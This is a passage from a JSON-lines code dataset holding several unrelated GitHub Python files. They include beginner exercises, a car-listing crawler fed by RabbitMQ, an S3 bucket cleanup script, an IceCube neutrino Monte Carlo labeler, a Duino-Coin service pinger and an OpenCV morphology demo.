resultado = list(filter((lambda x: x % 2 == 0), lista)) \r\n print(resultado)\r\n resultado = reduce( (lambda x, y: x + y), resultado) \r\n print(resultado)\r\n \r\ndef pares1(numeros):\r\n resultado1 = list(filter((lambda x: x%2==0), numeros))\r\n print(resultado1)\r\n resultado1 = reduce((lambda x ,y: x+y),resultado1)\r\n print(resultado1)\r\n\r\nlista = list(range(100))\r\nnumeros = [1,2,3,4,5,6,7,8,9,10]\r\n\r\n\r\npares(lista)\r\npares1(numeros)","repo_name":"txematc/openBootcamp","sub_path":"practica/ejercicio_9_2.py","file_name":"ejercicio_9_2.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"810403438","text":"from core.pika_connect import connection, channel\n\nimport time\n\nfrom models.cars_8891 import cars_8891\nfrom core.database_mysql import get_db\n\nimport requests\nimport json\n\n\nMAX_RETRIES = 10\nSLEEP_TIME = 15\n\n\ndef craw8891(url, db):\n \n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',\n }\n\n for i in range(MAX_RETRIES):\n try:\n response = requests.get(url, headers=headers)\n break\n except:\n time.sleep(SLEEP_TIME)\n else:\n print(f\"Failed to request get after {MAX_RETRIES} retries, exiting...\")\n return False \n\n json_data = json.loads(response.text)\n\n datas = json_data['data']['data']\n\n for data in datas:\n\n new_data = cars_8891(data_id=data['id'],\n data=data)\n \n record = db.query(cars_8891).filter(cars_8891.data_id == data['id']).first()\n \n if record == None:\n db.add(new_data)\n db.commit()\n db.refresh(new_data)\n \n return True\n\n\n\ndb = next(get_db())\n\n# craw8891('https://auto.8891.com.tw/usedauto-newSearch.html?page=4', db)\n\n\ndef callback(ch, method, properties, body):\n \n print(f' [x] Receivde: {body.decode()}')\n\n url = body.decode()\n\n result = craw8891(url, db)\n\n time.sleep(5)\n \n if result:\n ch.basic_ack(method.delivery_tag)\n else:\n ch.basic_nack(method.delivery_tag)\n\nchannel.queue_declare(queue='8891-queue', durable=True)\nchannel.basic_qos(prefetch_count=1)\n\nchannel.basic_consume(queue='8891-queue', on_message_callback=callback)\n\ntry:\n channel.start_consuming()\nexcept KeyboardInterrupt:\n channel.stop_consuming()\n\n\nconnection.close()\n","repo_name":"HankCodeLife/cars_crawler","sub_path":"consumer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27413282351","text":"from setuptools import setup, find_packages\n\nVERSION = '0.0.1' \nDESCRIPTION = 'Privacy Taxonomy'\nLONG_DESCRIPTION = \"Python interface to Ethyca's Privacy Taxonomy\"\n\nsetup(\n name=\"privacy_taxonmy\", \n version=VERSION,\n author=\"Jason White\",\n author_email=\"actinolite.jw@gmail.com\",\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n packages=find_packages(),\n install_requires=[\n 'owlready2'\n ], \n keywords=['python', 'privacy'],\n classifiers= [\n \"Development Status :: 3 - Alpha\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: MacOS :: MacOS X\",\n ]\n)\n","repo_name":"JasonMWhite/privacy-taxonomy-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20668185360","text":"#!/usr/bin/env python\n\nBUCKET = 'frontend-codereview-3-pipelin-artifactstorebucket-7s9c29rhnt9o'\n\nimport boto3\nimport sys\n\n\ns3 = boto3.resource('s3')\nbucket = s3.Bucket(sys.argv[1])\ntry:\n bucket.object_versions.delete()\nexcept:\n print(\"error deleting versions:\", sys.exc_info())\n\n# if you want to delete the now-empty bucket as well, uncomment this line:\nbucket.delete()\nprint(bucket)","repo_name":"BIBSYSDEV/NVA-infrastructure-test","sub_path":"utils/delete_bucket.py","file_name":"delete_bucket.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39994398724","text":"t= int(input())\n\nl=[]\nfor i in range(t):\n a,b = list(map(int,input().split()[:2]))\n l.append((a,b))\n\n\nfor a,b in l:\n sum=0\n if b>a:\n for k in range(a+1,b):\n if k%2!=0:\n sum+=k\n print(sum)\n sum=0\n else:\n for k in range(b+1,a):\n if k%2!=0:\n sum+=k\n print(sum)\n sum=0\n","repo_name":"Ksj14-kumar/DSA","sub_path":"Codeforces/Begginer/Sheet#2/Problem-17.py","file_name":"Problem-17.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13077094047","text":"#mc_labeler.py script\nfrom enums import (\n cascade_interactions,\n classification,\n class_mapping,\n containments_types,\n interaction_types,\n nugen_int_t_mapping,\n track_interactions,\n tau_interactions,\n)\n\nimport numpy as np\nimport warnings\nfrom icecube import dataclasses, dataio, MuonGun, icetray\nfrom icecube.dataclasses import I3Particle\nfrom I3Tray import I3Units\n\ntry:\n from icecube import LeptonInjector\n\n LI_FOUND = True\nexcept:\n LI_FOUND = False\n\n\n# Convenience collections\nnegative_charged_leptons = [I3Particle.EMinus, I3Particle.MuMinus, I3Particle.TauMinus]\npositive_charged_leptons = [I3Particle.EPlus, I3Particle.MuPlus, I3Particle.TauPlus]\nall_charged_leptons = negative_charged_leptons + positive_charged_leptons\n\nmuon_types = [I3Particle.MuMinus, I3Particle.MuPlus]\ntau_types = [I3Particle.TauMinus, I3Particle.TauPlus]\nelectron_types = [I3Particle.EMinus, I3Particle.EPlus]\n\nneutrino_types = [I3Particle.NuE, I3Particle.NuMu, I3Particle.NuTau]\nanti_neutrino_types = [I3Particle.NuEBar, I3Particle.NuMuBar, I3Particle.NuTauBar]\nall_neutrinos = neutrino_types + anti_neutrino_types\n\nelectron_neutrinos = [I3Particle.NuE, I3Particle.NuEBar]\nmuon_neutrinos = [I3Particle.NuMu, I3Particle.NuMuBar]\ntau_neutrinos = [I3Particle.NuTau, I3Particle.NuTauBar]\n\n# from clsim\ncascade_types = [\n I3Particle.Neutron,\n I3Particle.Hadrons,\n I3Particle.Pi0,\n I3Particle.PiPlus,\n I3Particle.PiMinus,\n I3Particle.K0_Long,\n I3Particle.KPlus,\n I3Particle.KMinus,\n I3Particle.PPlus,\n I3Particle.PMinus,\n I3Particle.K0_Short,\n I3Particle.EMinus,\n I3Particle.EPlus,\n I3Particle.Gamma,\n I3Particle.Brems,\n I3Particle.DeltaE,\n I3Particle.PairProd,\n I3Particle.NuclInt,\n]\n\n\nclass MCLabeler(icetray.I3Module):\n def __init__(self, context):\n super().__init__(context)\n gcd = '/home/icecube/Desktop/eliz_zooniverse/icecubezooniverseproj_ver3/i3_files/GeoCalibDetectorStatus_2012.56063_V1.i3.gz'\n open_gcd = dataio.I3File(gcd)\n open_gcd.rewind()\n frame1 = open_gcd.pop_frame(icetray.I3Frame.Geometry)\n i3geo = frame1['I3Geometry']\n\n self.AddParameter(\"gcd\", \"Path of GCD File. If none use g frame\", i3geo\n)\n self.AddParameter(\n \"cr_muon_padding\",\n \"Padding for CR muons. Increase to count muons passing further out. \",\n 150 * I3Units.m,\n )\n self.AddParameter(\n \"det_hull_padding\",\n \"Padding for the detector hull for calculating containment.\",\n 0 * I3Units.m,\n )\n self.AddParameter(\n \"mcpe_pid_map_name\",\n \"Name of the I3MCPESeriesMapParticleIDMap. Set to `None` to disable background MCPE counting.\"\n \"Note: Naive MCPE downsampling will render I3MCPESeriesMapParticleIDMap useles\",\n \"I3MCPESeriesMapParticleIDMap\",\n )\n self.AddParameter(\n \"mcpe_map_name\",\n \"Name of the I3MCPESeriesMap\",\n \"I3MCPulseSeriesMap\",\n )\n self.AddParameter(\"mctree_name\", \"Name of the I3MCTree\", \"SignalI3MCTree\")\n self.AddParameter(\n \"bg_mctree_name\",\n \"Name of the background I3MCTree. (Change if coincident events are in a\"\n \" separate MCTree)\",\n \"I3MCTree\",\n )\n self.AddParameter(\n \"event_properties_name\", \"Name of the LI EventProperties.\", None\n )\n self.AddParameter(\"weight_dict_name\", \"Name of the I3MCWeightDict\", 'I3MCWeightDict')\n self.AddParameter(\n \"corsika_weight_map_name\", \"Name of the CorsikaWeightMap\", None\n )\n self.AddParameter(\"key_postfix\", \"Postfix for the keys stored in the frame\", \"\")\n\n self._surface = None\n self._surface_cr = None\n\n def Configure(self):\n self._geo = self.GetParameter(\"gcd\")\n self._cr_muon_padding = self.GetParameter(\"cr_muon_padding\")\n self._det_hull_padding = self.GetParameter(\"det_hull_padding\")\n self._mcpe_pid_map_name = self.GetParameter(\"mcpe_pid_map_name\")\n self._mcpe_map_name = self.GetParameter(\"mcpe_map_name\")\n self._mctree_name = self.GetParameter(\"mctree_name\")\n self._bg_mctree_name = self.GetParameter(\"bg_mctree_name\")\n self._event_properties_name = self.GetParameter(\"event_properties_name\")\n self._weight_dict_name = self.GetParameter(\"weight_dict_name\")\n self._corsika_weight_map_name = self.GetParameter(\"corsika_weight_map_name\")\n self._key_postfix = self.GetParameter(\"key_postfix\")\n\n if (self._event_properties_name is not None) + (\n self._weight_dict_name is not None) + (self._corsika_weight_map_name is not None) != 1:\n raise RuntimeError(\n \"Set only one of event_properties_name, weight_dict_name and corsika_weight_map_name\"\n )\n\n self._is_li = self._event_properties_name is not None\n if self._is_li and not LI_FOUND:\n raise RuntimeError(\n \"Simulation is LeptonInjector but couldn't import LeptonInjector.\"\n )\n self._is_corsika = self._corsika_weight_map_name is not None\n\n def Geometry(self, frame):\n if self._geo is None:\n self._geo = frame[\"I3Geometry\"]\n self.PushFrame(frame)\n\n @staticmethod\n def find_neutrinos(tree):\n return tree.get_filter(\n lambda p: (p.type in all_neutrinos) and np.isfinite(p.length)\n )\n\n @staticmethod\n def get_inice_neutrino(tree, is_li):\n #print(tree.get_primaries())\n neutrino_primary = [p for p in tree.get_primaries() if p.type in all_neutrinos] #here is fix\n #print(len(neutrino_primary))\n if len(neutrino_primary) != 1:\n return 1\n #raise RuntimeError(\"Found more or less than one primary neutrino\")\n neutrino_primary = neutrino_primary[0]\n\n if is_li:\n # Assume that LI only inserts the final, in-ice neutrino\n return neutrino_primary\n\n\n # Not LI. Find highest energy in-ice neutrino\n in_ice_nu = tree.get_best_filter(\n lambda p: (p.location_type == I3Particle.InIce) and\n (p.type in all_neutrinos) and\n tree.is_in_subtree(neutrino_primary, p),\n lambda p1, p2: p1.energy > p2.energy)\n\n\n # if not in_ice_nu:\n # For some reason, NuGen sometimes marks non-final neutrinos as in-ice.\n # As a work-around find the highest energy in-ice particle in the\n # subtree of the neutrino primary and work back from there\n in_ice = tree.get_best_filter(\n lambda p: (p.location_type == I3Particle.InIce)\n and ((p.type in all_charged_leptons) or (p.type == I3Particle.Hadrons))\n and tree.is_in_subtree(neutrino_primary, p),\n lambda p1, p2: p1.energy > p2.energy,\n )\n\n def parent_nu(part, tree):\n \"\"\"Recursively find the parent neutrino\"\"\"\n if part.type in all_neutrinos:\n return part\n parent = tree.parent(part)\n return parent_nu(parent, tree)\n\n in_ice_nu = parent_nu(in_ice, tree)\n\n # Sanity check\n\n nu_children = tree.children(in_ice_nu)\n\n subnu = [\n p\n for p in nu_children\n if (p.type in all_neutrinos) and p.location_type == I3Particle.InIce\n ]\n if subnu and tree.children(subnu[0]):\n print(\"Warning: found two in-ice neutrinos, trying child particle\")\n return subnu[0]\n\n return in_ice_nu\n\n @staticmethod\n def get_corsika_muons(tree):\n primaries = [p for p in tree.get_primaries() if p.type not in all_neutrinos]\n muons = [\n p\n for primary in primaries\n for p in tree.children(primary)\n if p.type in muon_types\n ]\n\n return muons\n\n @staticmethod\n def get_containment(\n p, surface, decayed_before_type=containments_types.no_intersect\n ):\n \"\"\"\n Determine containment type for particle `p`.\n if `p` is a track, the `decayed_before_type` allows specifiying the\n containment type of particles that would intersect with the\n surface, but decay before entering.\n \"\"\"\n\n intersections = surface.intersection(p.pos, p.dir)\n\n if not np.isfinite(intersections.first):\n return containments_types.no_intersect\n\n if p.is_cascade:\n if intersections.first <= 0 and intersections.second > 0:\n return containments_types.contained\n return containments_types.no_intersect\n\n if p.is_track:\n # Check if starting or contained\n if intersections.first <= 0 and intersections.second > 0:\n if p.length <= intersections.second:\n return containments_types.contained\n return containments_types.starting\n\n # Check if throughgoing or stopping\n if intersections.first > 0 and intersections.second > 0:\n if p.length <= intersections.first:\n return decayed_before_type\n if p.length > intersections.second:\n return containments_types.throughgoing\n else:\n return containments_types.stopping\n return containments_types.no_intersect\n\n @staticmethod\n def get_neutrino_interaction_type_li(prop):\n # Test for leptonic Glashow\n if (\n (prop.initialType == I3Particle.NuEBar)\n and (prop.finalType1 in negative_charged_leptons)\n and (prop.finalType2 in anti_neutrino_types)\n ):\n if prop.finalType1 == I3Particle.EMinus:\n return interaction_types.gr_leptonic_e\n if prop.finalType1 == I3Particle.MuMinus:\n return interaction_types.gr_leptonic_mu\n if prop.finalType1 == I3Particle.TauMinus:\n return interaction_types.gr_leptonic_tau\n\n # Test for hadronic Glashow\n if (\n (prop.initialType == I3Particle.NuEBar)\n and (prop.finalType1 == I3Particle.Hadrons)\n and (prop.finalType2 == I3Particle.Hadrons)\n ):\n return interaction_types.gr_hadronic\n\n # Test for CC\n if prop.finalType1 in all_charged_leptons:\n if prop.initialType in electron_neutrinos:\n return interaction_types.nue_cc\n if prop.initialType in muon_neutrinos:\n return interaction_types.numu_cc\n if prop.initialType in tau_neutrinos:\n return interaction_types.nutau_cc\n\n # Test for NC\n if prop.finalType1 in all_neutrinos:\n if prop.initialType in electron_neutrinos:\n return interaction_types.nue_nc\n if prop.initialType in muon_neutrinos:\n return interaction_types.numu_nc\n if prop.initialType in tau_neutrinos:\n return interaction_types.nutau_nc\n\n raise RuntimeError(\n \"Unknown interaction type: {} -> {} + {}\".format(\n prop.initialType, prop.finalType1, prop.finalType2\n )\n )\n\n @staticmethod\n def get_neutrino_interaction_type_nugen(wdict, tree):\n int_t = wdict[\"InteractionType\"]\n nutype = wdict[\"InIceNeutrinoType\"]\n neutrino = MCLabeler.get_inice_neutrino(tree, is_li=False)\n\n if neutrino is None:\n return None\n\n children = tree.children(neutrino)\n if len(children) != 2:\n\n raise RuntimeError(\n \"Neutrino interaction with more or less than two children.\"\n )\n\n if int_t != 3:\n return nugen_int_t_mapping[(nutype, int_t)]\n\n if int_t == 3:\n # GR.\n if (children[0].type == I3Particle.Hadrons) and (\n children[1].type == I3Particle.Hadrons\n ):\n return interaction_types.gr_hadronic\n if (children[0].type in electron_types) or (\n children[1].type in electron_types\n ):\n return interaction_types.gr_leptonic_e\n if (children[0].type in muon_types) or (children[1].type in muon_types):\n return interaction_types.gr_leptonic_mu\n if (children[0].type in tau_types) or (children[1].type in tau_types):\n return interaction_types.gr_leptonic_tau\n raise RuntimeError(\n \"Unknown interaction type: {} -> {} + {} (Nugen type {})\".format(\n neutrino.type, children[0].type, children[1].type, int_t\n )\n )\n\n def _classify_neutrinos(self, frame):\n\n tree = frame[self._mctree_name]\n if self._is_li:\n prop = frame[self._event_properties_name]\n int_t = self.get_neutrino_interaction_type_li(prop)\n else:\n wdict = frame[self._weight_dict_name]\n int_t = self.get_neutrino_interaction_type_nugen(wdict, tree)\n\n in_ice_neutrino = self.get_inice_neutrino(tree, self._is_li)\n\n if in_ice_neutrino is not None:\n\n children = tree.children(in_ice_neutrino)\n # Classify everything related to muons\n if int_t in track_interactions:\n # figure out if vertex is contained\n muons = [p for p in children if p.type in muon_types]\n if len(muons) != 1:\n raise RuntimeError(\n \"Muon interaction with not exactly one muon child\"\n )\n\n containment = self.get_containment(muons[0], self._surface)\n\n # Classify everything related to cascades\n\n elif int_t in cascade_interactions:\n cascades = [p for p in children if p.is_cascade]\n if not cascades:\n raise RuntimeError(\n \"Found cascade-type interaction but no cascade children\"\n )\n # We can have more than one cascade, just check the first\n # TODO: Check whether there are any pitfalls with this approach\n\n containment = self.get_containment(cascades[0], self._surface)\n\n elif int_t in tau_interactions:\n taus = [p for p in children if p.type in tau_types]\n if len(taus) != 1:\n raise RuntimeError(\"Tau interaction with not exactly one tau child\")\n\n containment = self.get_containment(taus[0], self._surface)\n\n # if the tau is contained, check the tau decay\n if containment == containments_types.contained:\n tau_children = tree.children(taus[0])\n muons = [p for p in tau_children if p.type in muon_types]\n if len(muons) > 0:\n # the tau decays into a muon\n containment = containments_types.tau_to_mu\n\n if containment == containments_types.no_intersect:\n # Check the containment of the resulting muon\n tau_muons = [\n p for p in tree.children(taus[0]) if p.type in muon_types\n ]\n if len(tau_muons) > 1:\n raise RuntimeError(\"Tau decay with more than one muon\")\n elif len(tau_muons) == 1:\n # We have a muon\n\n muon_containment = self.get_containment(\n tau_muons[0], self._surface\n )\n containment = muon_containment\n\n # Since the tau is uncontained, we label the event by the topology\n # of the muon created in the tau decay\n int_t = interaction_types.numu_cc\n\n else:\n raise RuntimeError(\"Unknown interaction type: {}\".format(int_t))\n else:\n int_t = None\n containment = None\n return int_t, containment\n\n def _classify_corsika(self, frame):\n \"\"\"\n Classify corsika events.\n The code to distinguish bundles / single muons is not yet perfect. There might\n be edge cases, where a single muon accompanied by low-energy muons that stop far\n away from the detector is classified as skimming\n \"\"\"\n\n tree = frame[self._mctree_name]\n corsika_muons = self.get_corsika_muons(tree)\n\n containments = [\n self.get_containment(\n muon, self._surface, decayed_before_type=containments_types.decayed\n )\n for muon in corsika_muons\n ]\n\n int_t = interaction_types.corsika\n\n # Check if we are dealing with a single muon.\n # Number of muons that would have intersected by decay before entering the detector\n num_decayed = len(\n [cont for cont in containments if cont == containments_types.decayed]\n )\n\n if num_decayed == len(containments) - 1:\n # all decayed except one. containment type is given by surviving muon\n not_decayed = [\n cont for cont in containments if cont != containments_types.decayed\n ][0]\n return int_t, not_decayed\n\n # at least one muon is uncontained\n if any([cont == containments_types.no_intersect for cont in containments]):\n return int_t, containments_types.no_intersect\n\n # All muons are stopping\n if all([cont == containments_types.stopping for cont in containments]):\n return int_t, containments_types.stopping_bundle\n\n # Bundle is throughgoing\n return int_t, containments_types.throughgoing_bundle\n\n def classify(self, frame):\n if self._mctree_name not in frame:\n raise RuntimeError(\"I3MCTree no found\")\n\n if self._surface is None:\n self._surface = MuonGun.ExtrudedPolygon.from_I3Geometry(\n self._geo, self._det_hull_padding\n )\n self._surface_cr = MuonGun.ExtrudedPolygon.from_I3Geometry(\n self._geo, self._cr_muon_padding\n )\n\n if self._is_corsika:\n int_t, containment = self._classify_corsika(frame)\n else:\n int_t, containment = self._classify_neutrinos(frame)\n\n # Polyplopia\n tree = frame[self._mctree_name]\n bg_tree = frame[self._bg_mctree_name]\n poly_muons = self.get_corsika_muons(bg_tree)\n containments = [\n self.get_containment(muon, self._surface_cr) for muon in poly_muons\n ]\n\n n_stop_through = sum(\n [\n 1\n for cont in containments\n if cont\n in [containments_types.stopping, containments_types.throughgoing]\n ]\n )\n\n mcpe_from_muons = 0\n mcpe_from_muons_charge = 0\n\n # Sadly some simulations break the MCPEID map, so give useres the chance to skip\n if self._mcpe_pid_map_name is not None and self._mcpe_pid_map_name in frame:\n # Also collect MCPE from CR muons\n poly_muon_ids = [p.id for p in poly_muons]\n # Most MCPE will be caused by daughter particles of the muon\n poly_muon_ids += [ch.id for p in poly_muons for ch in tree.children(p)]\n\n mcpe_series_map = frame[self._mcpe_map_name]\n if self._mcpe_map_name in frame:\n # Collect the total mcpe charge from CR muons\n for omkey, idmap in frame[self._mcpe_pid_map_name]:\n\n if omkey not in mcpe_series_map:\n warnings.warn(\"Couldn't find OMKey in MCPESeriesMap\")\n else:\n mcpe_series = mcpe_series_map[omkey]\n for pmid in poly_muon_ids:\n # loop through the PIDs\n if pmid in idmap.keys():\n mcpe_indices = idmap[pmid]\n mcpe_from_muons_charge += sum(\n [mcpe_series[i].npe for i in mcpe_indices]\n )\n\n mcpe_from_muons += len(mcpe_indices)\n\n return (\n class_mapping.get((int_t, containment), classification.unclassified),\n n_stop_through,\n mcpe_from_muons,\n mcpe_from_muons_charge,\n )\n\n def DAQ(self, frame):\n if self._geo is None:\n raise RuntimeError(\"No geometry information found\")\n classif, n_coinc, bg_mcpe, bg_mcpe_charge = self.classify(frame)\n frame[\"classification\" + self._key_postfix] = icetray.I3Int(int(classif))\n frame[\"classification_label\" + self._key_postfix] = dataclasses.I3String(\n classif.name\n )\n frame[\"coincident_muons\" + self._key_postfix] = icetray.I3Int(n_coinc)\n frame[\"bg_muon_mcpe\" + self._key_postfix] = icetray.I3Int(bg_mcpe)\n frame[\"bg_muon_mcpe_charge\" + self._key_postfix] = dataclasses.I3Double(\n bg_mcpe_charge\n )\n self.PushFrame(frame)\n","repo_name":"ewarrick/name_that_neutrino","sub_path":"mc_labeler.py","file_name":"mc_labeler.py","file_ext":"py","file_size_in_byte":21237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21736771628","text":"# RM: 98943 Nome: Gustvao Fernandes Gonzalez Magalhaes\n\n# codigo cp1, para fazer uma compra\n# numa vinheria\n\nprint(\"Seja bem vindo ao site!!!\")\n\nnome = input(\"Nome completo: \")\nidade = int(input(\"Sua idade: \"))\nendereço_do_cliente = input(\"endereço: \")\nendereço_de_entrega = input(\"endereço de entrega: \")\n\nif endereço_do_cliente != endereço_de_entrega:\n z = int(input(\"O endereço de entrega difere do endereço do cliente, caso esteja correto digite 1: \"))\n if z == 1:\n print(\"OK!\")\n else:\n print(\"corrija o endereço!!!\")\n\n# 2 se a compra estiver sendo feita por um menor de idade\nwhile True:\n if idade < 18:\n print(\"A compra so pode ser realizada por um cliente maior de idade\")\n break\nif idade >= 18: \n \n a = print(\"[vinhos: \\n] 1 para vinho1(R$50) \\n 2 para vinho2(R$70) \\n 3 para vinho3(R$25) \\n 4 para vinho4(R$80) \\n 5 para vinho5(R$110)\")\n carrinho = 0\n vinho1 = 50\n vinho2 = 70\n vinho3 = 25\n vinho4 = 80\n vinho5 = 110\n estoque = 350\n x = 1\n\n while x < estoque:\n vinhos = int(input(\"digite o(s) numero(s) do(s) vinho(s) que você deseja comprar e 0 para finalizar a compra \\n\"))\n\n if vinhos == 0:\n break\n \n \n else:\n if vinhos == 1:\n carrinho = carrinho + vinho1\n \n elif vinhos == 2: \n carrinho = carrinho + vinho2\n \n elif vinhos == 3: \n carrinho = carrinho + vinho3\n \n elif vinhos == 4: \n carrinho = carrinho + vinho4\n \n elif vinhos == 5: \n carrinho = carrinho + vinho5\n \n x += 1\n \n if vinhos > 5:\n print(\"digite apenas um dos numeors pedidos\")\n \n if carrinho <= 100:\n print(\"o valor minimo para realizar a compra é de r$100\")\n \n elif carrinho >= 200:\n print(\"O seu frete nao sera combrado\")\n \n else:\n carrinho = carrinho + 15\n print(\"o valor do seu frete sera de R$15\")\n \n print(\"para que possamos finalizar sua compra porfavor complete com as informaçoes abaixo:\")\n\n cpf = str(input(\"Seu CPF: \"))\n cep = str(input(\"o CEP do local de entrega: \"))\n\n print(\"foram comprados %d produtos\" % x)\n print(\"o valor final da sua compra sera de R$%d\"% carrinho)\n print(\"seu(s) produto(s) serao entregues no(a) \"+ endereço_de_entrega)\n\n a = int(input(\"Para finalizar a compra digite 1: \"))\n \n if a == 1:\n print(\"obrigado pela compra\")\n \n else:\n print(\"Compra cancelada\")\n \n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"GustavoFGM/cp1.Python","sub_path":"cp1.py","file_name":"cp1.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74786044888","text":"#This python code is used to ping all duco services and create a json file with online/offline services\nimport urllib.request\nimport json\nimport time\nimport socket\nfrom websocket import create_connection\nimport os\nhostnames = {\n #websites\n \"website\": \"https://duinocoin.com\",\n \"api\": \"https://server.duinocoin.com/users/revox\",\n \"masterweb\": \"https://server.duinocoin.com/\",\n}\npools = {\n \"bilapool\": {\n \"ip\": \"51.158.113.59\",\n \"port\": 6042\n },\n \"beyondpool\": {\n \"ip\": \"50.112.145.154\",\n \"port\": 6002\n },\n \"svkopool\": {\n \"ip\": \"5.230.69.132\",\n \"port\": 6000\n },\n \"starpool\":{\n \"ip\": \"51.158.182.90\",\n \"port\": 6006\n }\n}\nonline = {\n \"website\": False,\n \"api\": False,\n \"bilapool\": False,\n \"beyondpool\": False,\n \"svkopool\": False,\n \"starpool\": False,\n \"masterweb\": False,\n}\n\nsince = {\n \"website\": False,\n \"api\": False,\n \"bilapool\": False,\n \"beyondpool\": False,\n \"svkopool\": False,\n \"starpool\": False,\n \"masterweb\": False,\n}\n\ndef checkanode(nodeobj):\n maxretrys = 0\n node= False\n while node != True and maxretrys<2:\n try:\n print(\"Testing %s with try number:\" % nodeobj + str(maxretrys))\n maxretrys+=1\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n s.settimeout(10)\n s.connect((nodeobj[\"ip\"], nodeobj[\"port\"])) \n msg = s.recv(1024)\n if(msg.decode(\"utf-8\") != \"\"):\n s.close()\n print(\"Accessing successfull\")\n node = True\n return node\n except:\n print(\"error\")\n return False\ndef checkweb(hostname):\n maxretrys=0\n web = False\n while web != True and maxretrys<4: \n try:\n print(\"Testing %s with try number:\" % hostname + str(maxretrys))\n maxretrys+=1\n\n url = hostname\n req = urllib.request.Request(\n url, \n data=None, \n headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\n }\n )\n with urllib.request.urlopen(req) as url2:\n if(url2.getcode()==200):\n web=True\n print(\"Accessing successfull\")\n return web\n except:\n print(\"error\")\n return False\nif __name__ == \"__main__\":\n for elements in pools:\n if checkanode(pools[elements]):\n online[elements]=True\n for elements in hostnames:\n if checkweb(hostnames[elements]):\n online[elements]=True\n with open('ducostats.json', 'r') as f:\n data = json.load(f)\n for elements in data:\n if(elements != \"lastupdate\"):\n if data[elements][\"online\"] != online[elements]:\n since[elements]=time.time()\n else:\n since[elements]=data[elements][\"since\"]\n for x in online:\n data[x][\"online\"]=online[x]\n data[x][\"since\"]=since[x]\n data[\"lastupdate\"] = int(time.time())\n with open('ducostats.json', 'w', encoding='utf-8') as file:\n json.dump(data, file)\n\n ","repo_name":"Lulaschkas/duco-mining-dashboard","sub_path":"checkducoservices.py","file_name":"checkducoservices.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"32398691459","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\ndef nothing(x):\r\n pass\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\ncv2.namedWindow(\"trackbars\")\r\ncv2.createTrackbar('th', 'trackbars', 50, 255, nothing) # borrão\r\ncv2.createTrackbar('erosao', 'trackbars', 1, 255, nothing) # erosão\r\ncv2.createTrackbar('dil', 'trackbars', 1, 255, nothing) # dilatação\r\ncv2.createTrackbar('opening', 'trackbars', 1, 255, nothing) # open\r\ncv2.createTrackbar('closing', 'trackbars', 1, 255, nothing) # close\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n # cv2.imshow('frame', frame)\r\n\r\n # escala de cinza\r\n gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\r\n # cv2.imshow('gray', gray)\r\n # blur\r\n blur = cv2.GaussianBlur(gray, (5, 5), 0)\r\n\r\n # THRESHOLD ou borrado\r\n th = cv2.getTrackbarPos('th', 'trackbars')\r\n ret, thresh = cv2.threshold(blur, th, 255, cv2.THRESH_BINARY)\r\n cv2.imshow('thresh', thresh)\r\n\r\n # Erosão\r\n kernel = np.ones((2, 2), np.uint8)\r\n erosao = cv2.getTrackbarPos('erosao', 'trackbars')\r\n erosion = cv2.erode(thresh, kernel, iterations=erosao)\r\n cv2.imshow('erosion', erosion)\r\n\r\n # Dilatação\r\n dil = cv2.getTrackbarPos('dil', 'trackbars')\r\n dilata = cv2.dilate(thresh, kernel, iterations=dil)\r\n cv2.imshow('dilata', dilata)\r\n\r\n # open\r\n op = cv2.getTrackbarPos('opening', 'trackbars')\r\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=op)\r\n cv2.imshow('opening', opening)\r\n\r\n # open\r\n cl = cv2.getTrackbarPos('closing', 'trackbars')\r\n closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel, iterations=cl)\r\n cv2.imshow('closing', closing)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('s'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"AlanGalvao/morfologia_imagens","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15608082850","text":"import pandas as pd\n\nclass DataCleanUp:\n df = pd.read_csv(\"/content/agro_clean_data.csv\")\n\n #Count how much a string in a cell appears in the whole file\n\n def CountAppearances():\n counter = 0\n for i in range(Rows):\n \n ######################################################################\n # Modify these parameters running code or it will generate an error! #\n ######################################################################\n \n if (df.at[i,'ColumnName'] == \"string to look for\"):\n counter = counter + 1\n\n if(counter > 1):\n print(\"The string has appeared \" + str(counter) + \" times in this spreadsheet\")\n elif(counter == 1):\n print(\"The string has appeared only once\")\n else:\n (\"Could not find the string\")\n\n\n #Change the character 